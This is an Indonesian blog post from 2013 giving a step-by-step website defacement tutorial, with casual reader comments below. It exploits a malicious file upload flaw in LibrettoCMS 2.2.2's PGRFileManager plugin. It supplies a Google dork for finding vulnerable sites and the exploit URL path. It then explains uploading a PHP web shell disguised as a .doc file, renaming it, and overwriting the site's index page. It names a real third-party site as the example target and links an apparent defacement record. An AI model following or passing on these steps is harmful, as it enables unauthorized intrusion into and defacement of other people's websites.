Exploit LibrettoCMS 2.2.2 Malicious File Upload

June 15, 2013 by Jack Wilder 8 Comments

Kali ini saya akan share teknik deface dengan exploit LibrettoCMS 2.2.2 Malicious File Upload. Exploitnya sangat mudah dipraktekkan terutama bagi para newbie seperti saya.
Oke langsung saja :

Bahan :
Shell php yang telah direname menjadi shell.doc
Dork :
inurl:adm/ui/js/ckeditor/plugins/pgrfilemanager
Exploit :
http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Step by Step :
Mulai berselancar di google. Cari target yang sabar.
Misalnya saya pilih http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/
Ubah menjadi
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php

Upload shell yang telah direname menjadi shell.doc.
Lihat gambar :

Setelah upload berhasil, rename shellnya menjadi shell.php

Akses shellnya di site/assets/user/shell.php

Hajar index. 🙂

http://www.bluespacethinking.com
http://www.hack-db.com/518922.html

Sekian dari saya, semoga bermanfaat. 🙂
Created by nabilaholic – www.madura-cyber.org

Comments

Wahyu Dwi says

June 15, 2013 at 1:02 am

mantep nih, pagi2 udah share pepes2 an >.<

Reply
Andre Irawan says

June 15, 2013 at 1:32 am

#Tsaahh

Reply
NewbieHacker061099.php says

June 15, 2013 at 2:04 am

mantap (Y) 😛 melodiest48 siapa tuh?

Reply
- chiaki says
  
  June 15, 2013 at 2:53 am
  
  Maho seberang lautan. :v
  
  Reply
Mas Nady says

June 15, 2013 at 4:40 am

kunjungan siang sob.. saya nyimak saja dech sob.. belum paham dengan CMS hehehe

Reply
Marisa Dwi Puspa says

June 15, 2013 at 9:56 am

Izin nyimak ya sob, aku belum tau apa-apa tentang postingan ini, hehehhe…. Mungkin dibookmark dulu aja, siapa tau butuh ntar

Reply
Irfan VBH says

June 16, 2013 at 3:51 am

Dorknya gak Jumpak Pak 🙁

Reply
Ihza Novellino says

June 27, 2013 at 9:12 am

Uploadnya lama ya :/

Reply

Leave a Reply Cancel reply